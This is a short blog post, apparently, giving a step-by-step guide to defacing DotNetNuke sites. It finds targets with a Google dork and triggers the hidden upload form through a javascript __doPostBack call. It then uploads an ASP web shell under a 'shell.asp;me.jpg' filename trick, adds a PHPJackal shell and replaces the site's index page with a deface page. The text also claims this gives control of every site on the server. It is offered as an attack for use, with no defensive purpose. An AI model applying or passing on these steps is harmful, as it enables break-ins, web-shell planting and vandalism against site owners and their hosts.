![=-=>>W3LC[]M3<<=-=](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKDfXWbxTiIVc3Mpzd5cHDrZosfQsD6U4AO1p-OXMSPw53WXIObbXzVhbwSucaYVwciOWxScMYx7TGvAd5xE9RnH-5Y4m-JMHs7p9K_B3iu7Sju0N8jjbeLkC47MybRRe1R9rA5tl1PFc/s1600/2.jpg)
WHAT IS DNN ?
DotNetNuke is an open source platform for building web sites based on Microsoft .NET technology. DotNetNuke is mainly provide Content Management System(CMS) for the personal websites.
Some easy Steps to implement Attack..
Things you will need:
An ASP Shell
PHPJackal OR C99 Shell
Some nice Deface pages.
So after you Download Needed files. Find the Vulnerable Website by using Google Dork.
Go to Google and type
inurl:fcklinkgallery.aspx
Now you will see lots of websites.
Pick anyone.
Press File.
Ok so now you go to your address bar and paste this Code & Hit Enter :
Code:
javascript:__doPostBack('ctlURL$cmdUpload','')
es Now We Can Upload Files From Our Compuetr :
Press Browse Open Downloaded files and select shell.asp;me.jpg and click Upload selected files.
Yeah
We have Uploaded our ASP Shell.
Now to navigate to our shell,goto
Code:
http://www.TARGETSITE.com/portals/0/shell.asp;me.jpg
Now you can upload your PHPJackal Shell ( included in the Everything you need.rar thing).
Now navigate to
Code:
http://www.TARGETSITE.com/portals/0/jackalshell.php
And rename one of the deface pages (the pages that were in the Everything you need thing) too index.html and upload it on the root of the site.
You have now defaced a site.
Wait Wait Wait
Not Only This Even you can control the root of the server
Click on the Website
Now You Control all the website which is on that server
No comments:
Post a Comment